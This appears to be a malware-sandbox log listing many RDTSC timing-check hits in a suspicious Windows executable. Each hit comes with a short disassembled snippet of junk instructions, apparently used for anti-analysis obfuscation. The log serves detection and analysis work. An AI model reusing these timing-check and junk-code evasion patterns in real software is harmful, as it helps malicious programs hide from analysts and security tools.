Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6AAC6 second address: B6AACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6AACA second address: B6AAE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6AAE8 second address: B6AB0A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA6CD35B91Ch 0x00000008 push ecx 0x00000009 jns 00007FA6CD35B916h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jl 00007FA6CD35B916h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6AB0A second address: B6AB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jno 00007FA6CC859EC6h 0x0000000e jmp 00007FA6CC859ECAh 0x00000013 jmp 00007FA6CC859ED4h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b jmp 00007FA6CC859ECEh 0x00000020 push esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6AE2C second address: B6AE49 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FA6CD35B923h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6AE49 second address: B6AE55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA6CC859EC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6AE55 second address: B6AE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CD35B91Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6AE6A second address: B6AE6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6AFC5 second address: B6AFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jno 00007FA6CD35B916h 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6AFD6 second address: B6AFDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6AFDC second address: B6B01F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FA6CD35B929h 0x0000000d pushad 0x0000000e jmp 00007FA6CD35B920h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007FA6CD35B916h 0x0000001e jo 00007FA6CD35B916h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6EADA second address: B6EAF8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA6CC859ED5h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6EAF8 second address: B6EAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6EAFD second address: B6EB33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED7h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA6CC859ED1h 0x0000000e jmp 00007FA6CC859ECAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B6EB33 second address: B6EB37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B7B3C4 second address: B7B411 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA6CC859EC6h 0x00000008 jmp 00007FA6CC859ED1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 jl 00007FA6CC859EC6h 0x00000018 jc 00007FA6CC859EC6h 0x0000001e push edx 0x0000001f pop edx 0x00000020 popad 0x00000021 jnl 00007FA6CC859ECEh 0x00000027 popad 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FA6CC859ECEh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B7B411 second address: B7B415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B7B415 second address: B7B438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA6CC859ED7h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B7AF7F second address: B7AF83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B7AF83 second address: B7AFB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007FA6CC859ED4h 0x0000000e pop ecx 0x0000000f jnp 00007FA6CC859ED0h 0x00000015 jmp 00007FA6CC859ECAh 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B7AFB5 second address: B7AFB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B822D5 second address: B822DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B822DB second address: B82319 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B928h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FA6CD35B945h 0x0000000f push esi 0x00000010 jmp 00007FA6CD35B929h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B80AFB second address: B80B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B80B00 second address: B80B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FA6CD35B916h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B80C6C second address: B80C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA6CC859EC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B80C76 second address: B80C7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B80DB8 second address: B80DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B80DBE second address: B80DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B80DC2 second address: B80DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B80DC6 second address: B80DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B80DD0 second address: B80E28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA6CC859ECBh 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FA6CC859ED1h 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 jne 00007FA6CC859ED5h 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007FA6CC859ECDh 0x00000025 jmp 00007FA6CC859ED6h 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B810F8 second address: B81142 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FA6CD35B91Ch 0x0000000c jmp 00007FA6CD35B91Bh 0x00000011 js 00007FA6CD35B91Ch 0x00000017 jnl 00007FA6CD35B916h 0x0000001d popad 0x0000001e pushad 0x0000001f jo 00007FA6CD35B92Bh 0x00000025 jmp 00007FA6CD35B925h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B81142 second address: B81146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B27518 second address: B27528 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jc 00007FA6CD35B928h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B27528 second address: B27578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CC859ECAh 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FA6CC859EC8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+1247A567h] 0x0000002b or ecx, dword ptr [ebp+122D39E4h] 0x00000031 add eax, ebx 0x00000033 sbb di, F733h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FA6CC859ECAh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B27578 second address: B275DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FA6CD35B916h 0x00000009 js 00007FA6CD35B916h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FA6CD35B918h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f or dword ptr [ebp+122D30E7h], ecx 0x00000035 push 00000004h 0x00000037 mov dword ptr [ebp+122D2A7Ch], eax 0x0000003d mov dword ptr [ebp+122D1DB4h], ecx 0x00000043 nop 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FA6CD35B925h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B275DB second address: B27613 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA6CC859EC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007FA6CC859ED1h 0x00000010 pop edi 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA6CC859ED7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B81FC2 second address: B81FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA6CD35B928h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B81FE1 second address: B81FFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B84C34 second address: B84C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B84C3E second address: B84C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B84C43 second address: B84C80 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA6CD35B92Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FA6CD35B916h 0x00000010 jmp 00007FA6CD35B924h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B84DE6 second address: B84DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B84DEF second address: B84DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B84DF3 second address: B84DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B84DF9 second address: B84E18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B925h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FA6CD35B916h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B84E18 second address: B84E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B84E1C second address: B84E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA6CD35B916h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B84E2F second address: B84E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B84E35 second address: B84E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B84E3A second address: B84E3F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B84F6B second address: B84F6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B8C0F9 second address: B8C0FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B8C0FE second address: B8C11D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B91Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA6CD35B91Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B8C11D second address: B8C121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B8C2A8 second address: B8C2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B8C8B1 second address: B8C8B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B8C8B8 second address: B8C8BD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B8CB76 second address: B8CB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA6CC859EC6h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B8CB81 second address: B8CB9F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA6CD35B91Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA6CD35B91Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B8D42F second address: B8D448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FA6CC859ED2h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B8D448 second address: B8D455 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA6CD35B918h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B8D455 second address: B8D468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c jbe 00007FA6CC859EC6h 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B8D9CA second address: B8D9D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B8D9D2 second address: B8D9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B8D9D8 second address: B8D9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B8D9DD second address: B8D9FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CC859ED9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B8DC97 second address: B8DCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007FA6CD35B918h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FA6CD35B91Ch 0x00000013 js 00007FA6CD35B916h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B920C9 second address: B920CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B920CE second address: B920E0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FA6CD35B91Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B91462 second address: B91466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B91A7E second address: B91A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA6CD35B916h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B91D75 second address: B91D7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B91D7A second address: B91D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B91D80 second address: B91DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CC859ECBh 0x00000009 jmp 00007FA6CC859ED4h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B91DAC second address: B91DB2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B91DB2 second address: B91DB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B91DB7 second address: B91DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BA074A second address: BA0750 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B9E8CF second address: B9E8DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FA6CD35B916h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B9EA34 second address: B9EA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA6CC859EC6h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B9EA3F second address: B9EA50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA6CD35B91Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B9F11A second address: B9F12A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jo 00007FA6CC859EC6h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B9F12A second address: B9F144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B925h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B9F144 second address: B9F14A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B9F297 second address: B9F29B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B9F40D second address: B9F411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B9F411 second address: B9F430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B929h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BA05DB second address: BA05F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CC859ED2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BA05F1 second address: BA05F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
